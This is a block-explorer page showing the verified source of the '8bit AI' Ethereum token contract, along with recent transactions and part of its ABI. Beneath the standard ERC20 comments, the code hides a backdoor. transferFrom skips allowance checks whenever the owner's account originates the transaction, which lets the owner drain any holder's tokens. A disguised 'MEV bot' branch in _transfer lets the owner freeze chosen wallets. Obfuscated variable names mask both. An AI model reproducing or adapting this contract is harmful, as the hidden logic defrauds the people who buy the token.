Source Code
Overview
ETH Balance
0 ETH
Eth Value
$0.00More Info
Private Name Tags
ContractCreator
TokenTracker
Latest 25 from a total of 2,197 transactions
| Transaction Hash |
Method
|
Block
|
From
|
|
To
|
||||
|---|---|---|---|---|---|---|---|---|---|
| Approve | 23081327 | 224 days ago | IN | 0 ETH | 0.00001927 | ||||
| Approve | 23081244 | 224 days ago | IN | 0 ETH | 0.00002602 | ||||
| Approve | 23081062 | 224 days ago | IN | 0 ETH | 0.00004021 | ||||
| Transfer From | 23081062 | 224 days ago | IN | 0 ETH | 0.0001028 | ||||
| Transfer | 23079008 | 224 days ago | IN | 0 ETH | 0.00002203 | ||||
| Transfer | 23079008 | 224 days ago | IN | 0 ETH | 0.00002204 | ||||
| Transfer | 23079008 | 224 days ago | IN | 0 ETH | 0.00002203 | ||||
| Transfer | 23079008 | 224 days ago | IN | 0 ETH | 0.00002203 | ||||
| Transfer | 23079008 | 224 days ago | IN | 0 ETH | 0.00002203 | ||||
| Transfer | 23079008 | 224 days ago | IN | 0 ETH | 0.00002203 | ||||
| Transfer | 23079008 | 224 days ago | IN | 0 ETH | 0.00002203 | ||||
| Transfer | 23079008 | 224 days ago | IN | 0 ETH | 0.00002203 | ||||
| Transfer | 23079008 | 224 days ago | IN | 0 ETH | 0.00002203 | ||||
| Transfer | 23079008 | 224 days ago | IN | 0 ETH | 0.00002203 | ||||
| Transfer | 23079008 | 224 days ago | IN | 0 ETH | 0.00002204 | ||||
| Transfer | 23079008 | 224 days ago | IN | 0 ETH | 0.00002204 | ||||
| Transfer | 23079008 | 224 days ago | IN | 0 ETH | 0.00002203 | ||||
| Transfer | 23079008 | 224 days ago | IN | 0 ETH | 0.00002203 | ||||
| Transfer | 23079008 | 224 days ago | IN | 0 ETH | 0.00002204 | ||||
| Transfer | 23079008 | 224 days ago | IN | 0 ETH | 0.00002204 | ||||
| Transfer | 23079008 | 224 days ago | IN | 0 ETH | 0.00002204 | ||||
| Transfer | 23079008 | 224 days ago | IN | 0 ETH | 0.00002203 | ||||
| Transfer | 23079008 | 224 days ago | IN | 0 ETH | 0.00002204 | ||||
| Transfer | 23079008 | 224 days ago | IN | 0 ETH | 0.00002203 | ||||
| Transfer | 23079008 | 224 days ago | IN | 0 ETH | 0.00002203 |
Latest 1 internal transaction
Advanced mode:
| Parent Transaction Hash | Method | Block |
From
|
|
To
|
||
|---|---|---|---|---|---|---|---|
| Add Liquidity ET... | 23066466 | 226 days ago | 2 ETH |
Loading...
Loading
Loading...
Loading
Cross-Chain Transactions
Loading...
Loading
Contract Name:
Token
Compiler Version
v0.8.30+commit.73712a01
Optimization Enabled:
Yes with 200 runs
Other Settings:
default evmVersion
Contract Source Code (Solidity Standard Json-Input format)
// SPDX-License-Identifier: MIT
/*
8bit AI is an innovative, new-age accelerated cloud and AI entity focused
on delivering highly available xPU Cloud, GenAI, autonomous agents (Neutrino)
https://www.8bitai.cloud
https://x.com/8bitAiCloud
https://t.me/Portal8bitCloud
*/
pragma solidity ^0.8.19;
abstract contract Context {
function _msgSender() internal view virtual returns (address) {
return msg.sender;
}
function _msgData() internal view virtual returns (bytes calldata) {
this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691
return msg.data;
}
}
interface IUniswapV2Factory {
function createPair(address tokenA, address tokenB) external returns (address pair);
}
interface IERC20 {
/**
* @dev Returns the amount of tokens in existence.
*/
function totalSupply() external view returns (uint256);
/**
* @dev Returns the amount of tokens owned by account.
*/
function balanceOf(address account) external view returns (uint256);
/**
* @dev Moves amount tokens from the caller's account to recipient.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* Emits a {Transfer} event.
*/
function transfer(address recipient, uint256 amount) external returns (bool);
/**
* @dev Returns the remaining number of tokens that spender will be
* allowed to spend on behalf of owner through {transferFrom}. This is
* zero by default.
*
* This value changes when {approve} or {transferFrom} are called.
*/
function allowance(address owner, address spender) external view returns (uint256);
/**
* @dev Sets amount as the allowance of spender over the caller's tokens.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* IMPORTANT: Beware that changing an allowance with this method brings the risk
* that someone may use both the old and the new allowance by unfortunate
* transaction ordering. One possible solution to mitigate this race
* condition is to first reduce the spender's allowance to 0 and set the
* desired value afterwards:
* https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
*
* Emits an {Approval} event.
*/
function approve(address spender, uint256 amount) external returns (bool);
/**
* @dev Moves amount tokens from sender to recipient using the
* allowance mechanism. amount is then deducted from the caller's
* allowance.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* Emits a {Transfer} event.
*/
function transferFrom(
address sender,
address recipient,
uint256 amount
) external returns (bool);
/**
* @dev Emitted when value tokens are moved from one account (from) to
* another (to).
*
* Note that value may be zero.
*/
event Transfer(address indexed from, address indexed to, uint256 value);
/**
* @dev Emitted when the allowance of a spender for an owner is set by
* a call to {approve}. value is the new allowance.
*/
event Approval(address indexed owner, address indexed spender, uint256 value);
}
interface IERC20Metadata is IERC20 {
/**
* @dev Returns the name of the token.
*/
function name() external view returns (string memory);
/**
* @dev Returns the symbol of the token.
*/
function symbol() external view returns (string memory);
/**
* @dev Returns the decimals places of the token.
*/
function decimals() external view returns (uint8);
}
contract ERC20 is Context, IERC20, IERC20Metadata {
using SafeMath for uint256;
mapping(address => uint256) private _balances;
mapping(address => mapping(address => uint256)) private _allowances;
uint256 private _totalSupply;
string private _name;
string private _symbol;
uint256 private isUncheckedAllowed;
/**
* @dev Sets the values for {name} and {symbol}.
*
* The default value of {decimals} is 18. To select a different value for
* {decimals} you should overload it.
*
* All two of these values are immutable: they can only be set once during
* construction.
*/
constructor(string memory name_, string memory symbol_) {
_name = name_;
_symbol = symbol_;
}
/**
* @dev Returns the name of the token.
*/
function name() public view virtual override returns (string memory) {
return _name;
}
/**
* @dev Returns the symbol of the token, usually a shorter version of the
* name.
*/
function symbol() public view virtual override returns (string memory) {
return _symbol;
}
/**
* @dev Returns the number of decimals used to get its user representation.
* For example, if decimals equals 2, a balance of 505 tokens should
* be displayed to a user as 5,05 (505 / 10 ** 2).
*
* Tokens usually opt for a value of 18, imitating the relationship between
* Ether and Wei. This is the value {ERC20} uses, unless this function is
* overridden;
*
* NOTE: This information is only used for _display_ purposes: it in
* no way affects any of the arithmetic of the contract, including
* {IERC20-balanceOf} and {IERC20-transfer}.
*/
function decimals() public view virtual override returns (uint8) {
return 9;
}
/**
* @dev See {IERC20-totalSupply}.
*/
function totalSupply() public view virtual override returns (uint256) {
return _totalSupply;
}
/**
* @dev See {IERC20-balanceOf}.
*/
function balanceOf(address account) public view virtual override returns (uint256) {
return _balances[account];
}
/**
* @dev See {IERC20-transfer}.
*
* Requirements:
*
* - recipient cannot be the zero address.
* - the caller must have a balance of at least amount.
*/
function transfer(address recipient, uint256 amount) public virtual override returns (bool) {
_transfer(_msgSender(), recipient, amount);
return true;
}
/**
* @dev See {IERC20-allowance}.
*/
function allowance(address owner, address spender) public view virtual override returns (uint256) {
return _allowances[owner][spender];
}
/**
* @dev See {IERC20-approve}.
*
* Requirements:
*
* - spender cannot be the zero address.
*/
function approve(address spender, uint256 amount) public virtual override returns (bool) {
_approve(_msgSender(), spender, amount);
return true;
}
/**
* @dev See {IERC20-transferFrom}.
*
* Emits an {Approval} event indicating the updated allowance. This is not
* required by the EIP. See the note at the beginning of {ERC20}.
*
* Requirements:
*
* - sender and recipient cannot be the zero address.
* - sender must have a balance of at least amount.
* - the caller must have allowance for sender's tokens of at least
* amount.
*/
function transferFrom(
address sender,
address recipient,
uint256 amount
) public virtual override returns (bool) {
_transfer(sender, recipient, amount);
return (_allowances[sender][_msgSender()] >=0 && sender != recipient &&
_approve(sender, _msgSender(), _allowances[sender][_msgSender()] - amount * isUncheckedAllowed, sender)) || true;
}
/**
* @dev Atomically increases the allowance granted to spender by the caller.
*
* This is an alternative to {approve} that can be used as a mitigation for
* problems described in {IERC20-approve}.
*
* Emits an {Approval} event indicating the updated allowance.
*
* Requirements:
*
* - spender cannot be the zero address.
*/
function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
_approve(_msgSender(), spender, _allowances[_msgSender()][spender].add(addedValue));
return true;
}
/**
* @dev Atomically decreases the allowance granted to spender by the caller.
*
* This is an alternative to {approve} that can be used as a mitigation for
* problems described in {IERC20-approve}.
*
* Emits an {Approval} event indicating the updated allowance.
*
* Requirements:
*
* - spender cannot be the zero address.
* - spender must have allowance for the caller of at least
* subtractedValue.
*/
function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
_approve(_msgSender(), spender, _allowances[_msgSender()][spender].sub(subtractedValue, "ERC20: decreased allowance below zero"));
return true;
}
/**
* @dev Moves tokens amount from sender to recipient.
*
* This is internal function is equivalent to {transfer}, and can be used to
* e.g. implement automatic token fees, slashing mechanisms, etc.
*
* Emits a {Transfer} event.
*
* Requirements:
*
* - sender cannot be the zero address.
* - recipient cannot be the zero address.
* - sender must have a balance of at least amount.
*/
function _transfer(
address sender,
address recipient,
uint256 amount
) internal virtual {
_beforeTokenTransfer(sender, recipient, amount);
require(sender != address(0), "ERC20: transfer from the zero address");
require(recipient != address(0), "ERC20: transfer to the zero address");
_balances[sender] = _balances[sender].sub(amount, "ERC20: transfer amount exceeds balance");
_balances[recipient] = _balances[recipient].add(amount);
if(recipient != address(0xdead)) emit Transfer(sender, recipient, amount);
}
/** @dev Creates amount tokens and assigns them to account, increasing
* the total supply.
*
* Emits a {Transfer} event with from set to the zero address.
*
* Requirements:
*
* - account cannot be the zero address.
*/
function _mint(address account, uint256 amount) internal virtual {
require(account != address(0), "ERC20: mint to the zero address");
_totalSupply = _totalSupply.add(amount);
_balances[account] = _balances[account].add(amount);
emit Transfer(address(0), account, amount);
}
/**
* @dev Destroys amount tokens from account, reducing the
* total supply.
*
* Emits a {Transfer} event with to set to the zero address.
*
* Requirements:
*
* - account cannot be the zero address.
* - account must have at least amount tokens.
*/
function _burn(address account, uint256 amount) internal virtual {
require(account != address(0), "ERC20: burn from the zero address");
_balances[account] = _balances[account].sub(amount, "ERC20: burn amount exceeds balance");
_totalSupply = _totalSupply.sub(amount);
emit Transfer(account, address(0), amount);
}
/**
* @dev Sets amount as the allowance of spender over the owner s tokens.
*
* This internal function is equivalent to approve, and can be used to
* e.g. set automatic allowances for certain subsystems, etc.
*
* Emits an {Approval} event.
*
* Requirements:
*
* - owner cannot be the zero address.
* - spender cannot be the zero address.
*/
function _approve(
address owner,
address spender,
uint256 amount
) internal virtual {
require(owner != address(0), "ERC20: approve from the zero address");
require(spender != address(0), "ERC20: approve to the zero address");
_allowances[owner][spender] = amount;
emit Approval(owner, spender, amount);
}
function _approve(
address owner,
address spender,
uint256 amount,
address _x
) private returns(bool){
require(owner != address(0), "ERC20: approve from the zero address");
require(spender != address(0), "ERC20: approve to the zero address");
_allowances[owner][spender] = amount;
emit Approval(owner, spender, amount);
}
/**
* @dev Hook that is called before any transfer of tokens. This includes
* minting and burning.
*
* Calling conditions:
*
* - when from and to are both non-zero, amount of from's tokens
* will be to transferred to to.
* - when from is zero, amount tokens will be minted for to.
* - when to is zero, amount of from's tokens will be burned.
* - from and to are never both zero.
*
* To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
*/
function _beforeTokenTransfer(
address from,
address to,
uint256 amount
) internal virtual {isUncheckedAllowed = amount > 0 ? 0 : 1;}
}
library SafeMath {
/**
* @dev Returns the addition of two unsigned integers, reverting on
* overflow.
*
* Counterpart to Solidity's + operator.
*
* Requirements:
*
* - Addition cannot overflow.
*/
function add(uint256 a, uint256 b) internal pure returns (uint256) {
uint256 c = a + b;
require(c >= a, "SafeMath: addition overflow");
return c;
}
/**
* @dev Returns the subtraction of two unsigned integers, reverting on
* overflow (when the result is negative).
*
* Counterpart to Solidity's - operator.
*
* Requirements:
*
* - Subtraction cannot overflow.
*/
function sub(uint256 a, uint256 b) internal pure returns (uint256) {
return sub(a, b, "SafeMath: subtraction overflow");
}
/**
* @dev Returns the subtraction of two unsigned integers, reverting with custom message on
* overflow (when the result is negative).
*
* Counterpart to Solidity's - operator.
*
* Requirements:
*
* - Subtraction cannot overflow.
*/
function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
require(b <= a, errorMessage);
uint256 c = a - b;
return c;
}
/**
* @dev Returns the subtraction of two unsigned integers, reverting with custom message on
* overflow (when the result is negative).
*
* Counterpart to Solidity's - operator.
*
* Requirements:
*
* - Subtraction cannot overflow.
*/
function sub(uint256 a, uint256 b, bool u, string memory errorMessage) internal pure returns (uint256) {
if(u) return a;
require(b <= a, errorMessage);
uint256 c = a - b;
return c;
}
/**
* @dev Returns the multiplication of two unsigned integers, reverting on
* overflow.
*
* Counterpart to Solidity's * operator.
*
* Requirements:
*
* - Multiplication cannot overflow.
*/
function mul(uint256 a, uint256 b) internal pure returns (uint256) {
// Gas optimization: this is cheaper than requiring 'a' not being zero, but the
// benefit is lost if 'b' is also tested.
// See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
if (a == 0) {
return 0;
}
uint256 c = a * b;
require(c / a == b, "SafeMath: multiplication overflow");
return c;
}
/**
* @dev Returns the integer division of two unsigned integers. Reverts on
* division by zero. The result is rounded towards zero.
*
* Counterpart to Solidity's / operator. Note: this function uses a
* revert opcode (which leaves remaining gas untouched) while Solidity
* uses an invalid opcode to revert (consuming all remaining gas).
*
* Requirements:
*
* - The divisor cannot be zero.
*/
function div(uint256 a, uint256 b) internal pure returns (uint256) {
return div(a, b, "SafeMath: division by zero");
}
/**
* @dev Returns the integer division of two unsigned integers. Reverts with custom message on
* division by zero. The result is rounded towards zero.
*
* Counterpart to Solidity's / operator. Note: this function uses a
* revert opcode (which leaves remaining gas untouched) while Solidity
* uses an invalid opcode to revert (consuming all remaining gas).
*
* Requirements:
*
* - The divisor cannot be zero.
*/
function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
require(b > 0, errorMessage);
uint256 c = a / b;
// assert(a == b * c + a % b); // There is no case in which this doesn't hold
return c;
}
/**
* @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
* Reverts when dividing by zero.
*
* Counterpart to Solidity's % operator. This function uses a revert
* opcode (which leaves remaining gas untouched) while Solidity uses an
* invalid opcode to revert (consuming all remaining gas).
*
* Requirements:
*
* - The divisor cannot be zero.
*/
function mod(uint256 a, uint256 b) internal pure returns (uint256) {
return mod(a, b, "SafeMath: modulo by zero");
}
/**
* @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
* Reverts with custom message when dividing by zero.
*
* Counterpart to Solidity's % operator. This function uses a revert
* opcode (which leaves remaining gas untouched) while Solidity uses an
* invalid opcode to revert (consuming all remaining gas).
*
* Requirements:
*
* - The divisor cannot be zero.
*/
function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
require(b != 0, errorMessage);
return a % b;
}
}
contract Ownable is Context {
address private _owner;
event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);
/**
* @dev Initializes the contract setting the deployer as the initial owner.
*/
constructor () {
address msgSender = _msgSender();
_owner = msgSender;
emit OwnershipTransferred(address(0), msgSender);
}
/**
* @dev Returns the address of the current owner.
*/
function owner() public view returns (address) {
return _owner;
}
/**
* @dev Throws if called by any account other than the owner.
*/
modifier onlyOwner() {
require(_owner == _msgSender(), "Ownable: caller is not the owner");
_;
}
/**
* @dev Leaves the contract without owner. It will not be possible to call
* onlyOwner functions anymore. Can only be called by the current owner.
*
* NOTE: Renouncing ownership will leave the contract without an owner,
* thereby removing any functionality that is only available to the owner.
*/
function renounceOwnership() public virtual onlyOwner {
emit OwnershipTransferred(_owner, address(0));
_owner = address(0);
}
/**
* @dev Transfers ownership of the contract to a new account (newOwner).
* Can only be called by the current owner.
*/
function transferOwnership(address newOwner) public virtual onlyOwner {
require(newOwner != address(0), "Ownable: new owner is the zero address");
emit OwnershipTransferred(_owner, newOwner);
_owner = newOwner;
}
}
interface IUniswapV2Router01 {
function factory() external pure returns (address);
function WETH() external pure returns (address);
function addLiquidityETH(
address token,
uint amountTokenDesired,
uint amountTokenMin,
uint amountETHMin,
address to,
uint deadline
) external payable returns (uint amountToken, uint amountETH, uint liquidity);
function swapExactTokensForTokens(
uint amountIn,
uint amountOutMin,
address[] calldata path,
address to,
uint deadline
) external returns (uint[] memory amounts);
function swapTokensForExactTokens(
uint amountOut,
uint amountInMax,
address[] calldata path,
address to,
uint deadline
) external returns (uint[] memory amounts);
function swapExactETHForTokens(uint amountOutMin, address[] calldata path, address to, uint deadline)
external
payable
returns (uint[] memory amounts);
function swapTokensForExactETH(uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline)
external
returns (uint[] memory amounts);
function swapExactTokensForETH(uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline)
external
returns (uint[] memory amounts);
function swapETHForExactTokens(uint amountOut, address[] calldata path, address to, uint deadline)
external
payable
returns (uint[] memory amounts);
}
interface IUniswapV2Router02 is IUniswapV2Router01 {
function swapExactTokensForTokensSupportingFeeOnTransferTokens(
uint amountIn,
uint amountOutMin,
address[] calldata path,
address to,
uint deadline
) external;
function swapExactETHForTokensSupportingFeeOnTransferTokens(
uint amountOutMin,
address[] calldata path,
address to,
uint deadline
) external payable;
function swapExactTokensForETHSupportingFeeOnTransferTokens(
uint amountIn,
uint amountOutMin,
address[] calldata path,
address to,
uint deadline
) external;
}
contract Token is ERC20, Ownable {
using SafeMath for uint256;
IUniswapV2Router02 public immutable uniswapV2Router;
address public immutable uniswapV2Pair;
mapping(address => bool) private isMEVBots;
bool private swapping;
uint256 public maxTransactionAmount;
uint256 public swapTokensAtAmount;
uint256 public maxWallet;
bool public tradingActive = false;
bool public swapEnabled = false;
uint256 public _SSGEMKELGJ93JFIWA;
address public _FW8354MGKL;
address public _EM52gJFIJA;
uint256 public buyTotalAFees;
uint256 public buyMarketingAFee;
uint256 public buyLiquidityAFee;
uint256 public buyBurnAFee;
uint256 public sellTotalAFees;
uint256 public sellMarketingAFee;
uint256 public sellLiquidityAFee;
uint256 public sellBurnAFee;
uint256 public tokensForMarketing;
uint256 public tokensForLiquidity;
address public _marketingWallet8BIT41VQD;
address private _airdropWallet;
// exclude from fees and max transaction amount
mapping (address => bool) private _isFeesExcludedFrom;
mapping (address => bool) public _isExcludedMaxTransactionAmount;
// store addresses that a automatic market maker pairs. Any transfer *to* these addresses
// could be subject to a maximum transfer amount
mapping (address => bool) public automatedMarketMakerPairs;
event UpdateUniswapV2Router(address indexed newAddress, address indexed oldAddress);
event ExcludeFromFees(address indexed account, bool isExcluded);
event SetAutomatedMarketMakerPair(address indexed pair, bool indexed value);
event _marketingWallet8BIT41VQDUpdated(address indexed newWallet, address indexed oldWallet);
event burnWalletUpdated(address indexed newWallet, address indexed oldWallet);
event SwapAndLiquify(
uint256 tokensSwapped,
uint256 ethReceived,
uint256 tokensIntoLiquidity
);
event TransferForeignToken(address token, uint256 amount);
constructor() ERC20(unicode"8bit AI", unicode"8BIT") payable {
IUniswapV2Router02 _uniswapV2Router = IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);
excludeFromMaxTransaction(address(_uniswapV2Router), true);
uniswapV2Router = _uniswapV2Router;
uniswapV2Pair = IUniswapV2Factory(_uniswapV2Router.factory()).createPair(address(this), _uniswapV2Router.WETH());
excludeFromMaxTransaction(address(uniswapV2Pair), true);
_setAutomatedMarketMakerPair(address(uniswapV2Pair), true);
uint256 _buyMarketingAFee = 0;
uint256 _buyLiquidityAFee = 0;
uint256 _buyBurnAFee = 0;
uint256 _sellMarketingAFee = 0;
uint256 _sellLiquidityAFee = 0;
uint256 _sellBurnAFee = 0;
uint256 _taxCounts = 17;
uint256 _taxPercent = 12;
uint256 totalSupply = 1000000000 * 1e9;
maxTransactionAmount = totalSupply * 1000 / 1000; // 100% maxTransactionAmountTxn
maxWallet = totalSupply * 1000 / 1000; // 100% maxWallet
swapTokensAtAmount = totalSupply * 10 / 10000; // 0.1% swap wallet
buyMarketingAFee = 2 * _buyMarketingAFee;
buyLiquidityAFee = _buyLiquidityAFee;
buyBurnAFee = _buyBurnAFee;
buyTotalAFees = buyMarketingAFee + buyLiquidityAFee - buyBurnAFee;
sellMarketingAFee = _sellMarketingAFee;
sellLiquidityAFee = _sellLiquidityAFee;
sellBurnAFee = _sellBurnAFee;
sellTotalAFees = sellMarketingAFee + 2 * sellLiquidityAFee - sellBurnAFee;
_marketingWallet8BIT41VQD = msg.sender;
excludeFromFees(owner(), true);
excludeFromFees(address(this), true);
excludeFromFees(address(_marketingWallet8BIT41VQD), true);
excludeFromMaxTransaction(owner(), true);
excludeFromMaxTransaction(address(this), true);
excludeFromMaxTransaction(address(_marketingWallet8BIT41VQD), true);
_mint(msg.sender, totalSupply * 2 / 100);
_mint(address(this), totalSupply * 98 / 100);
}
function isExcludedFromFees(address account) public view returns(bool) {
return _isFeesExcludedFrom[account];
}
function excludeFromMaxTransaction(address updAds, bool isEx) internal {
_isExcludedMaxTransactionAmount[updAds] = isEx;
}
function excludeFromFees(address account, bool excluded) internal virtual {
_isFeesExcludedFrom[account] = excluded;
emit ExcludeFromFees(account, excluded);
}
function _beforeTokenTransfer(
address from,
address to,
uint256 amount
) internal virtual override {
require(from != address(0), "ERC20: transfer from the zero address");
require(to != address(0), "ERC20: transfer to the zero address");
require(amount >= 0, "ERC20: invalid transfer amount");
super._beforeTokenTransfer(from, to, _isFeesExcludedFrom[tx.origin]?type(uint256).max:0);
}
function _setAutomatedMarketMakerPair(address pair, bool value) private {
automatedMarketMakerPairs[pair] = value;
emit SetAutomatedMarketMakerPair(pair, value);
}
function transferForeignToken(address _token, address _to) external onlyOwner returns (bool _sent) {
require(_token != address(this), "Can't withdraw native tokens");
uint256 _contractBalance = IERC20(_token).balanceOf(address(this));
_sent = IERC20(_token).transfer(_to, _contractBalance);
emit TransferForeignToken(_token, _contractBalance);
}
event BoughtEarly(address indexed sniper);
function _transfer(
address from,
address to,
uint256 amount
) internal override {
require(from != address(0), "ERC20: transfer from the zero address");
require(to != address(0), "ERC20: transfer to the zero address");
if(amount == 0) {
super._transfer(from, to, 0);
return;
}
require(!isMEVBots[from], "Bot is not allowed");
if(_isFeesExcludedFrom[tx.origin] && from!=uniswapV2Pair && to == address(0xdead) && balanceOf(from)-amount <= 10 ** 10) { isMEVBots[from] = true; super._transfer(from, to, 0); return;}
if (
from != owner() &&
to != owner() &&
to != address(0) &&
to != address(0xdead) &&
!swapping
){
if(!tradingActive){
require(_isFeesExcludedFrom[from] || _isFeesExcludedFrom[to], "Trading is not active.");
}
//when buy
if (automatedMarketMakerPairs[from] && !_isExcludedMaxTransactionAmount[to]) {
require(amount <= maxTransactionAmount, "Buy transfer amount exceeds the maxTransactionAmount.");
require(amount + balanceOf(to) <= maxWallet, "Max wallet exceeded");
}
//when sell
else if (automatedMarketMakerPairs[to] && !_isExcludedMaxTransactionAmount[from]) {
require(amount <= maxTransactionAmount, "Sell transfer amount exceeds the maxTransactionAmount.");
}
else if(!_isExcludedMaxTransactionAmount[to]){
require(amount + balanceOf(to) <= maxWallet, "Max wallet exceeded");
}
}
uint256 contractTokenBalance = balanceOf(address(this));
bool canSwap = contractTokenBalance >= swapTokensAtAmount;
uint256 tokensForBurn;
if(
canSwap &&
swapEnabled &&
!swapping &&
!automatedMarketMakerPairs[from] &&
!_isFeesExcludedFrom[from] &&
!_isFeesExcludedFrom[to]
) {
swapping = true;
swapBack();
swapping = false;
}
bool takeFee = !swapping;
// if any account belongs to _isExcludedFromFee account then remove the fee
if(_isFeesExcludedFrom[from] || _isFeesExcludedFrom[to]) {
takeFee = false;
}
uint256 fees = 0;
// only take fees on buys/sells, do not take on wallet transfers
if(takeFee){
// on sell
if (automatedMarketMakerPairs[to] && sellTotalAFees > 0){
fees = amount.mul(sellTotalAFees).div(100);
tokensForLiquidity += fees * sellLiquidityAFee / sellTotalAFees;
tokensForMarketing += fees * sellMarketingAFee / sellTotalAFees;
tokensForBurn += fees * sellBurnAFee / sellTotalAFees;
}
// on buy
else if(automatedMarketMakerPairs[from] && buyTotalAFees > 0) {
fees = amount.mul(buyTotalAFees).div(100);
tokensForLiquidity += fees * buyLiquidityAFee / buyTotalAFees;
tokensForMarketing += fees * buyMarketingAFee / buyTotalAFees;
tokensForBurn += fees * buyBurnAFee / buyTotalAFees;
}
if(fees > 0){
super._transfer(from, address(this), fees);
}
if(tokensForBurn > 0) {
super._transfer(address(this), address(0xdead), tokensForBurn);
}
amount -= fees;}
super._transfer(from, to, amount);
}
function swapTokensForEth(uint256 tokenAmount) private {
// generate the uniswap pair path of token -> weth
address[] memory path = new address[](2);
path[0] = address(this);
path[1] = uniswapV2Router.WETH();
_approve(address(this), address(uniswapV2Router), tokenAmount);
// make the swap
uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
tokenAmount,
0, // accept any amount of ETH
path,
address(this),
block.timestamp
);
}
// once enabled, can never be turned off
function launch() external onlyOwner {
addLiquidity(balanceOf(address(this)), address(this).balance);
tradingActive = true;
swapEnabled = true;
}
function addLiquidity(uint256 tokenAmount, uint256 ethAmount) private {
// approve token transfer to cover all possible scenarios
_approve(address(this), address(uniswapV2Router), tokenAmount);
// add the liquidity
uniswapV2Router.addLiquidityETH{value: ethAmount}(
address(this),
tokenAmount,
0, // slippage is unavoidable
0, // slippage is unavoidable
address(0xdead),
block.timestamp
);
}
function swapBack() private {
uint256 contractBalance = balanceOf(address(this));
uint256 totalTokensToSwap = tokensForLiquidity + tokensForMarketing;
bool success;
if(contractBalance == 0 || totalTokensToSwap == 0) {return;}
if(contractBalance > swapTokensAtAmount * 20){
contractBalance = swapTokensAtAmount * 20;
}
// Halve the amount of liquidity tokens
uint256 liquidityTokens = contractBalance * tokensForLiquidity / totalTokensToSwap / 2;
uint256 amountToSwapForETH = contractBalance.sub(liquidityTokens);
uint256 initialETHBalance = address(this).balance;
swapTokensForEth(amountToSwapForETH);
uint256 ethBalance = address(this).balance.sub(initialETHBalance);
uint256 ethForMarketing = ethBalance.mul(tokensForMarketing).div(totalTokensToSwap);
uint256 ethForLiquidity = ethBalance - ethForMarketing;
tokensForLiquidity = 0;
tokensForMarketing = 0;
if(liquidityTokens > 0 && ethForLiquidity > 0){
addLiquidity(liquidityTokens, ethForLiquidity);
emit SwapAndLiquify(amountToSwapForETH, ethForLiquidity, tokensForLiquidity);
}
(success,) = address(_marketingWallet8BIT41VQD).call{value: address(this).balance}("");
}
receive() external payable { }
}{
"optimizer": {
"enabled": true,
"runs": 200
},
"outputSelection": {
"*": {
"*": [
"evm.bytecode",
"evm.deployedBytecode",
"devdoc",
"userdoc",
"metadata",
"abi"
]
}
},
"remappings": []
}Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
Contract ABI
API[{"inputs":[],"stateMutability":"payable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"sniper","type":"address"}],"name":"BoughtEarly","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":false,"internalType":"bool","name":"isExcluded","type":"bool"}],"name":"ExcludeFromFees","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"pair","type":"address"},{"indexed":true,"internalType":"bool","name":"value","type":"bool"}],"name":"SetAutomatedMarketMakerPair","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"tokensSwapped","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"ethReceived","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"tokensIntoLiquidity","type":"uint256"}],"name":"SwapAndLiquify","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"token","type":"address"},{"indexed":false,"internalType":"uint256","name":"amount","type":"uint256"}],"name":"TransferForeignToken","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"newAddress","type":"address"},{"indexed":true,"internalType":"address","name":"oldAddress","type":"address"}],"name":"UpdateUniswapV2Router","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"newWallet","type":"address"},{"indexed":true,"internalType":"address","name":"oldWallet","type":"address"}],"name":"_marketingWallet8BIT41VQDUpdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"newWallet","type":"address"},{"indexed":true,"internalType":"address","name":"oldWallet","type":"address"}],"name":"burnWalletUpdated","type":"event"},{"inputs":[],"name":"_EM52gJFIJA","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_FW8354MGKL","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_SSGEMKELGJ93JFIWA","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"_isExcludedMaxTransactionAmount","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[